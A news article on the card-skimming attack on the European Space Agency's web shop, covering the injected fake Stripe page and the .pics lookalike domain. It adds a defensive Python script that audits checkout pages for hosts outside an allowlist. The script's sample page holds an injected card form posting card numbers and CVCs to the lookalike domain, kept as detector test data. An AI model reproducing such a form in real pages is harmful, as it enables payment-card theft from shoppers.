The European Space Agency’s official web shop was hacked recently, compromising customer payment card information during the checkout process. This incident, which involved the injection of malicious JavaScript code, has raised significant concerns regarding the security of the agency’s online retail operations, which are integrated with its internal systems. The store, known for selling ESA merchandise, is currently unavailable, displaying a notice that it is “temporarily out of orbit.”
ESA hack unveils a dangerous trend in online shopping fraud
On the day of the attack, e-commerce security company Sansec identified the malicious script that collected sensitive customer data, including payment card details. Investigations revealed that the script generated a fake Stripe payment page, effectively tricking buyers into entering their information. Notably, the fraudulent page looked convincing, presenting itself as part of the official ESA web shop, which may have contributed to the success of the attack.
The attack also relied on a domain name closely resembling that of the legitimate store. While the official ESA shop operates under the “esaspaceshop” name with a .com TLD, the attacker registered the same name under the .pics TLD (esaspaceshop[.]pics), a tactic that could easily mislead customers. Such domain spoofing underscores the need for heightened awareness and security measures among online shoppers, especially when it comes to sensitive financial transactions.
Screenshot: the web shop’s main screen as it looks at the time of writing.
The European Space Agency, which operates with a budget exceeding 10 billion euros, is dedicated to advancing space exploration by training astronauts and developing rockets and satellites to uncover the universe’s mysteries. However, this security breach poses risks not only to customers but also to ESA employees, given the interconnected nature of its systems. The agency has yet to comment publicly on the breach or outline the steps it will take to enhance security moving forward.
As the investigation continues, concerns remain regarding the extent of the data accessed and the potential implications for those whose payment information may have been compromised. The fact that the malicious script employed obfuscated HTML code from the legitimate Stripe SDK adds another layer of complexity to the incident. Stripe, a widely used online payment processing platform, will likely be involved in the ongoing evaluations to help mitigate future risks.
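The two traits described above, a lookalike domain that differs from the shop’s only in its TLD and payment code masquerading as the Stripe SDK, are exactly what a merchant-side audit of a checkout page can check for. The following is an added example, not code from ESA, Sansec or Stripe: it extracts the hosts a page loads scripts from or posts forms to and compares them against an allowlist (the allowlist, the sample page and the `cdn.example.net` host are constructed for the example; the `.pics` lookalike is the one named in the article).

```python
import re
from urllib.parse import urlparse

# Hosts the shop legitimately loads code from or submits forms to.
# Constructed allowlist: the shop's own domain from the article plus Stripe's
# hosted JS; a real deployment would derive this from its Content-Security-Policy.
ALLOWED_HOSTS = {"esaspaceshop.com", "www.esaspaceshop.com", "js.stripe.com"}

# Attributes through which injected skimmers usually load code or send data out.
_URL_ATTRS = re.compile(
    r"""<(?:script|form|iframe|img)\b[^>]*?\b(?:src|action)\s*=\s*["']([^"']+)["']""",
    re.IGNORECASE,
)

def registrable_label(host: str) -> str:
    """Second-level label, e.g. 'esaspaceshop' for 'esaspaceshop.pics'.
    Simplified: ignores multi-part public suffixes such as .co.uk."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else host.lower()

def audit_html(html: str) -> dict:
    """Classify every external URL in a page as allowed, lookalike or unknown.
    A lookalike shares its registrable label with an allowed host but not its TLD."""
    allowed_labels = {registrable_label(h) for h in ALLOWED_HOSTS}
    findings = {"allowed": [], "lookalike": [], "unknown": []}
    for url in _URL_ATTRS.findall(html):
        host = urlparse(url).hostname
        if not host:  # relative URL: served by the shop itself, nothing to compare
            continue
        host = host.lower()
        if host in ALLOWED_HOSTS:
            findings["allowed"].append(host)
        elif registrable_label(host) in allowed_labels:
            findings["lookalike"].append(host)
        else:
            findings["unknown"].append(host)
    return findings

# Constructed sample page: a genuine Stripe include next to an injected card form
# whose action points at the .pics lookalike, plus an unrelated third-party pixel.
SAMPLE_PAGE = """
<script src="https://js.stripe.com/v3/"></script>
<script src="/static/checkout.js"></script>
<form id="card" action="https://esaspaceshop.pics/collect" method="post">
  <input name="pan"><input name="cvc">
</form>
<img src="https://cdn.example.net/pixel.gif">
"""

if __name__ == "__main__":
    for kind, hosts in audit_html(SAMPLE_PAGE).items():
        print(f"{kind:9s} {hosts}")
```

Anything in the `lookalike` bucket is a strong signal of the spoofing pattern described above; `unknown` hosts are a weaker signal that still deserves review against the shop’s intended third-party dependencies.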
As a result of these developments, customers who have previously made purchases through the ESA web shop are advised to monitor their payment card statements for any unauthorized transactions. It remains unclear how many individuals may have been affected by the breach, and ESA has not yet released detailed information on the number of potentially impacted customers.
Featured image credit: European Space Agency